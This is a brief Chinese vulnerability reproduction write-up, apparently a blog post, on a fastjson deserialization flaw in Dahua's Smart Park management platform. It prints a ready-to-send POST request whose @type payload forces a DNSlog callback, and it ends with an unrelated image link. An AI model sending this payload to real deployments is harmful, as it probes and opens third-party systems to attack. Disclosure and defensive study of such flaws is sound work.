文章目录
- 免责声明
- 漏洞描述
- 漏洞原理
- 影响版本
- 漏洞复现
- 修复建议
免责声明
本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任
漏洞描述
大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。
漏洞原理
在平台的random借口处存在fastjson反序列化漏洞
影响版本
不详
漏洞复现
访问进行抓包提交post参数
POST /evo-runs/v1.0/auths/sysusers/random HTTP/2
Host: x.x.x.x
Accept: */*
Content-Type: application/json
Content-Length: 111
{"a":{"@type":"com.alibaba.fastjson.JSONObject",{"@type":"java.net.URL","val":"http://dnslog"}}""}
返回包是这样的
查看dnslog
修复建议
联系官方,获取最新版本
![[图解]实现领域驱动设计译文暴露的问题04](https://img-blog.csdnimg.cn/direct/5b1a9564908f4267a25284033e14cd68.png)
